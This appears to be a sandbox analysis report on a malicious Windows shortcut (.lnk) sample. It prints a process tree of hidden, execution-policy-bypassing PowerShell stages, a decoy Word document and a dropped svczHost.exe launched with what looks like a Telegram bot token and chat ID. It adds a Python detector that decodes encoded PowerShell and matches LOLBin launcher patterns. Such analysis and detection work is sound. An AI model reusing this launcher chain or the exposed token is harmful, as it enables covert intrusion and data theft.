Analysis
max time kernel: 139s
max time network: 154s
platform: windows10-2004_x64
resource: win10v2004-20230915-en
resource tags: arch:x64, arch:x86, image:win10v2004-20230915-en, locale:en-us, os:windows10-2004-x64, system
submitted: 20/09/2023, 15:54
Static task: static1
Behavioral task: behavioral1 (sample tmpyl4tkeg5.lnk, resource win7-20230831-en)
Behavioral task: behavioral2 (sample tmpyl4tkeg5.lnk, resource win10v2004-20230915-en)
General
Target: tmpyl4tkeg5.lnk
Size: 6.0MB
MD5: e4c11bee612af2f2f0d1361b098e456d
SHA1: 6f781c365ee30354378c3a671694976c6931e0de
SHA256: 6d51b225bf9e61258f0a40274f0427d8b27a57f11d6a23b7371587b1d1fcde82
SHA512: 78bc40ad85bfdb510c3502ac2e15e44e8d15eed226452bc52a004e1fb82a93b95abcad199fd38da45d224176a8c86db29ee87421ece0ed03aeca5acecbcc5578
SSDEEP: 384:9D0kk0QMlgiCvN0kkj1KcMz0kk3B0kk7WShStbMS7StxSPE0kkdsHZ:9D3kIlS3kj1Kce3kR3k7WwwMGOt3kdQ
Malware Config
Extracted: https://wordpress.d
Signatures
Detect suspicious LNK files with LOLBins [1ZRR4H] (1 IoC)
  yara_rule LNK_sospechosos matched resource behavioral2/files/0x000700000002305d-2.dat
Blocklisted process makes network request (2 IoCs)
  flow 26, pid 4676, powershell.exe
  flow 31, pid 1764, powershell.exe
Checks computer location settings (2 TTPs, 1 IoC)
  Looks up country code configured in the registry, likely geofence.
  Key value queried: \REGISTRY\USER\S-1-5-21-1574508946-349927670-1185736483-1000\Control Panel\International\Geo\Nation (cmd.exe)
Executes dropped EXE (1 IoC)
  pid 3772, svczHost.exe
Enumerates physical storage devices (2 TTPs)
  Attempts to interact with connected storage/optical drive(s).
Checks processor information in registry (2 TTPs, 3 IoCs)
  Processor information is often read in order to detect sandboxing environments.
  Key value queried: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz (WINWORD.EXE)
  Key value queried: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString (WINWORD.EXE)
  Key opened: \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 (WINWORD.EXE)
Enumerates system info in registry (2 TTPs, 3 IoCs)
  Key opened: \REGISTRY\MACHINE\Hardware\Description\System\BIOS (WINWORD.EXE)
  Key value queried: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily (WINWORD.EXE)
  Key value queried: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU (WINWORD.EXE)
  Note: every hit in these two signatures is attributed to WINWORD.EXE (pid 4240), the process that opens the decoy 2.docx, not to the dropped svczHost.exe or to any of the PowerShell stages. Treat them as the decoy viewer's activity; on their own they say nothing about sandbox evasion in the payload.
Modifies registry class (1 IoC)
  Key created: \REGISTRY\USER\S-1-5-21-1574508946-349927670-1185736483-1000_Classes\Local Settings (powershell.exe)
Suspicious behavior: AddClipboardFormatListener (2 IoCs)
  pid 4240, WINWORD.EXE (2 hits)
Suspicious behavior: EnumeratesProcesses (9 IoCs)
  pid 4060 powershell.exe (2), pid 4676 powershell.exe (2), pid 1764 powershell.exe (2), pid 2672 powershell.exe (2), pid 3772 svczHost.exe (1)
Suspicious use of AdjustPrivilegeToken (64 IoCs)
  Token: SeDebugPrivilege, pid 4060 powershell.exe
  Token: SeDebugPrivilege, pid 4676 powershell.exe
  Token: SeDebugPrivilege, pid 1764 powershell.exe
  pid 4676 powershell.exe then adjusts the following set, listed three times in the report: SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeManageVolumePrivilege, 33, 34, 35, 36 (the third pass ends at 34)
Suspicious use of SetWindowsHookEx (8 IoCs)
  pid 4240, WINWORD.EXE (8 hits)
Suspicious use of WriteProcessMemory (12 IoCs)
  PID 1704 cmd.exe wrote to memory of 4060 (procid_target 86), twice
  PID 4060 powershell.exe wrote to memory of 4676 (procid_target 87), twice
  PID 4676 powershell.exe wrote to memory of 1764 (procid_target 91), twice
  PID 1764 powershell.exe wrote to memory of 4240 (procid_target 93), twice
  PID 4676 powershell.exe wrote to memory of 3772 (procid_target 95), twice
  PID 3772 svczHost.exe wrote to memory of 2672 (procid_target 97), twice
Processes
1. C:\Windows\system32\cmd.exe
   cmd /c C:\Users\Admin\AppData\Local\Temp\tmpyl4tkeg5.lnk
   PID 1704
   - Checks computer location settings
   - Suspicious use of WriteProcessMemory
  2. C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
     "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -WindowStyle hidden -ExecutionPolicy bypass -EncodedCommand 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
     PID 4060
     - Suspicious behavior: EnumeratesProcesses
     - Suspicious use of AdjustPrivilegeToken
     - Suspicious use of WriteProcessMemory
    3. C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
       "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -WindowStyle hidden -ExecutionPolicy bypass -EncodedCommand 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
       PID 4676
       - Blocklisted process makes network request
       - Suspicious behavior: EnumeratesProcesses
       - Suspicious use of AdjustPrivilegeToken
       - Suspicious use of WriteProcessMemory
      4. C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
         "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
         (this is the command line PowerShell itself uses to spawn a background job host, e.g. for Start-Job; the parent 4676 is the stage that drives it)
         PID 1764
         - Blocklisted process makes network request
         - Modifies registry class
         - Suspicious behavior: EnumeratesProcesses
         - Suspicious use of AdjustPrivilegeToken
         - Suspicious use of WriteProcessMemory
        5. C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
           "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\2.docx" /o ""
           PID 4240
           - Checks processor information in registry
           - Enumerates system info in registry
           - Suspicious behavior: AddClipboardFormatListener
           - Suspicious use of SetWindowsHookEx
      4. C:\Windows\Temp\svczHost.exe
         "C:\Windows\Temp\svczHost.exe" 6199273323:AAHXE-ke2qDK8FiwavkWDQ950wUMnOUMlfM -1001390383947 khiem2
         PID 3772
         - Executes dropped EXE
         - Suspicious behavior: EnumeratesProcesses
         - Suspicious use of WriteProcessMemory
        5. C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
           "powershell.exe" -NoLogo -NoProfile -WindowStyle Hidden -ExecutionPolicy bypass -EncodedCommand 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
           PID 2672
           - Suspicious behavior: EnumeratesProcesses
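The LNK_sospechosos hit and the process tree above describe the same launcher pattern: a shell link whose target is a LOLBin, run with a hidden window, policy bypass and a base64-encoded PowerShell payload. The following is an added example, not code from the tria.ge report or from the rule's author: a minimal MS-SHLLINK parser that pulls the COMMAND_LINE_ARGUMENTS string out of a .lnk, decodes a -EncodedCommand payload, and scores the launcher heuristics the YARA rule approximates. The .lnk bytes and the PowerShell script inside them are constructed here; nothing about the real tmpyl4tkeg5.lnk is assumed. The report's sample is 6.0MB; this parser reads only the link structures at the front of the file and ignores whatever follows them.

```python
"""Minimal .lnk parser plus LOLBin launcher heuristics (constructed example)."""
import base64
import re
import struct
import uuid

LNK_CLSID = uuid.UUID("00021401-0000-0000-c000-000000000046")
# LinkFlags bits (MS-SHLLINK 2.1.1)
HAS_LINK_TARGET_ID_LIST, HAS_LINK_INFO = 0x01, 0x02
HAS_NAME, HAS_RELATIVE_PATH, HAS_WORKING_DIR = 0x04, 0x08, 0x10
HAS_ARGUMENTS, HAS_ICON_LOCATION, IS_UNICODE = 0x20, 0x40, 0x80
SW_SHOWMINNOACTIVE = 7  # ShowCommand that keeps the launched window out of sight
# StringData fields appear in this fixed order, each only if its flag is set
STRING_FIELDS = ((HAS_NAME, "name"), (HAS_RELATIVE_PATH, "relative_path"),
                 (HAS_WORKING_DIR, "working_dir"), (HAS_ARGUMENTS, "arguments"),
                 (HAS_ICON_LOCATION, "icon_location"))


def parse_lnk(data: bytes) -> dict:
    """Return header fields and StringData of a shell link; ValueError if not a .lnk."""
    if len(data) < 0x4C or struct.unpack_from("<I", data, 0)[0] != 0x4C:
        raise ValueError("bad HeaderSize")
    if uuid.UUID(bytes_le=data[4:20]) != LNK_CLSID:
        raise ValueError("bad LinkCLSID")
    flags = struct.unpack_from("<I", data, 20)[0]
    show_command = struct.unpack_from("<I", data, 60)[0]
    off = 0x4C
    if flags & HAS_LINK_TARGET_ID_LIST:      # IDListSize (u16) + IDList bytes
        off += 2 + struct.unpack_from("<H", data, off)[0]
    if flags & HAS_LINK_INFO:                # LinkInfoSize (u32) counts itself
        off += struct.unpack_from("<I", data, off)[0]
    out = {"flags": flags, "show_command": show_command}
    for bit, name in STRING_FIELDS:
        if not flags & bit:
            continue
        count = struct.unpack_from("<H", data, off)[0]  # CountCharacters, no terminator
        off += 2
        if flags & IS_UNICODE:
            out[name] = data[off:off + 2 * count].decode("utf-16-le")
            off += 2 * count
        else:
            out[name] = data[off:off + count].decode("cp1252", errors="replace")
            off += count
    return out


# -e, -ec, -enc, -EncodedCommand ... followed by a base64 token; -ExecutionPolicy does not match
ENCODED_CMD = re.compile(r"-e(?:c|n[a-z]*)?\s+([A-Za-z0-9+/=]{16,})", re.I)


def decode_encoded_command(cmdline: str):
    """Decode a PowerShell -EncodedCommand argument (base64 of UTF-16LE) or return None."""
    m = ENCODED_CMD.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


LOLBIN_RULES = (
    (r"\bcmd(?:\.exe)?\b.*(?:^|\s)/c\b", "cmd /c launcher"),
    (r"\bpowershell(?:\.exe)?\b", "powershell.exe"),
    (r"-w(?:indowstyle)?\s+hidden\b", "hidden window"),
    (r"-ex(?:ecutionpolicy)?\s+bypass\b", "execution policy bypass"),
    (r"-nop(?:rofile)?\b", "no profile"),
    (ENCODED_CMD.pattern, "encoded command"),
    (r"\b(?:mshta|rundll32|regsvr32|certutil|wscript|cscript|bitsadmin|msiexec)\b", "other LOLBin"),
)


def assess_lnk(lnk: dict) -> dict:
    """Apply the launcher heuristics to a parsed link and decode any embedded script."""
    target = " ".join(lnk.get(k, "") for k in ("relative_path", "arguments"))
    findings = [label for pat, label in LOLBIN_RULES if re.search(pat, target, re.I)]
    if lnk["show_command"] == SW_SHOWMINNOACTIVE:
        findings.append("ShowCommand=SW_SHOWMINNOACTIVE")
    decoded = decode_encoded_command(lnk.get("arguments", ""))
    return {"findings": findings, "decoded_command": decoded, "suspicious": len(findings) >= 3}


def build_lnk(relative_path: str, arguments: str, show_command: int = SW_SHOWMINNOACTIVE) -> bytes:
    """Construct a minimal Unicode .lnk: 76-byte header, RELATIVE_PATH, COMMAND_LINE_ARGUMENTS."""
    flags = HAS_RELATIVE_PATH | HAS_ARGUMENTS | IS_UNICODE
    header = (struct.pack("<I", 0x4C) + LNK_CLSID.bytes_le
              + struct.pack("<II", flags, 0x20)        # LinkFlags, FILE_ATTRIBUTE_ARCHIVE
              + b"\x00" * 24                            # Creation/Access/Write FILETIMEs
              + struct.pack("<IiIHHII", 0, 0, show_command, 0, 0, 0, 0))  # FileSize .. Reserved3
    body = b"".join(struct.pack("<H", len(s)) + s.encode("utf-16-le") for s in (relative_path, arguments))
    return header + body


# Constructed payload: opens a decoy document from %TEMP%, echoing the 2.docx step in the tree.
SAMPLE_SCRIPT = 'Start-Process "$env:TEMP\\2.docx"; Write-Host stage2'
SAMPLE_ARGS = ("-NoLogo -NoProfile -WindowStyle hidden -ExecutionPolicy bypass -EncodedCommand "
               + base64.b64encode(SAMPLE_SCRIPT.encode("utf-16-le")).decode("ascii"))
SAMPLE_LNK = build_lnk("..\\..\\..\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", SAMPLE_ARGS)

if __name__ == "__main__":
    info = parse_lnk(SAMPLE_LNK)
    verdict = assess_lnk(info)
    print("target :", info["relative_path"])
    print("flags  :", ", ".join(verdict["findings"]))
    print("decoded:", verdict["decoded_command"])
```

The parser skips LinkTargetIDList and LinkInfo by their own size prefixes, so it also works on links that carry a full target ID list rather than the RELATIVE_PATH used in the constructed sample. The scoring threshold of three findings is a heuristic chosen for this example, not the YARA rule's logic; tune it against your own corpus of benign shortcuts before using it as a detection.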
Network
MITRE ATT&CK Enterprise v15
Downloads
Filesize: 2KB
  MD5: 6cf293cb4d80be23433eecf74ddb5503
  SHA1: 24fe4752df102c2ef492954d6b046cb5512ad408
  SHA256: b1f292b6199aa29c7fafbca007e5f9e3f68edcbbca1965bc828cc92dc0f18bb8
  SHA512: 0f91e2da0da8794b9797c7b50eb5dfd27bde4546ceb6902a776664ce887dd6f12a0dd8773d612ccc76dfd029cd280778a0f0ae17ce679b3d2ffd968dd7e94a00
Filesize: 1KB
  MD5: 7f2baf9f564f57b2d899d3ffeebc1e20
  SHA1: 5bfa2f385b3d91af6b2e2726133da0eced5e0c58
  SHA256: 70076f6c9abc390f0da669fcff2505acd34df3f2f110410a97de38d957597d27
  SHA512: 53be49323730aa7ee6d47714ae3760d8f82acfb878accc585f3702491f4f0c6d439fe35619d26cf02d56bac989e0d1f11da773929005889e84660ea98fe5f6f7
Filesize: 64B
  MD5: 5caad758326454b5788ec35315c4c304
  SHA1: 3aef8dba8042662a7fcf97e51047dc636b4d4724
  SHA256: 83e613b6dc8d70e3bb67c58535e014f58f3e8b2921e93b55137d799fc8c56391
  SHA512: 4e0d443cf81e2f49829b0a458a08294bf1bdc0e38d3a938fb8274eeb637d9a688b14c7999dd6b86a31fcec839a9e8c1a9611ed0bbae8bd59caa9dba1e8253693
Filesize: 13KB
  MD5: 593b751b7f58d06173431e1f9ad95c89
  SHA1: 08f7fead968a430bbab23f5a10f6d5e4c64a334e
  SHA256: 0782b634ed40fc90f00e43afe586cf31a812b3d43f55a1572338df113f8a2b3e
  SHA512: c22f8d4d4074268de925d932c3d70fe2c66559fbbc7be9ea24acd63ee82c58fa87538eeabde883e807016b20400b6efd180e48c0308fc79b0724d703d5a2688d
Filesize: 60B
  MD5: d17fe0a3f47be24a6453e9ef58c94641
  SHA1: 6ab83620379fc69f80c0242105ddffd7d98d5d9d
  SHA256: 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
  SHA512: 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
Filesize: 15KB
  MD5: b5aded587a83b97147073b33e294d117
  SHA1: 88b917119c2270e7e9582e2b5c1c8a57ed35e5b8
  SHA256: 484b465dea76dc77bbbe23d5fd27755251a64ee642a80252615cd9ae17c45bcf
  SHA512: dd7a84ce56322542368faea42a02313a178ca392e1f13b0107afaa50c3f22063ecb4604b5d3f6056df8631c29f365c89002f62b861c9c8d2bbd8b686aa4cde7e
Filesize: 8.4MB (the same hashes are listed three times in the report)
  MD5: d6892b563e26fac43ef8ebec24e04509
  SHA1: 3d3e4412be48ea8b5ed5ca94e5239228841261bb
  SHA256: 6fa92749a9798450d7f7a7cd8cf7b5132ac9b90f0e0095185d8884393af45cc6
  SHA512: 276a1d74624d5d59f80e64f03ff51a0908d30261a434821e4fe6b04cf1faf8230b998a9dcd432976437cae301b41ef554e103d0410e684c3dad46fb3299e7475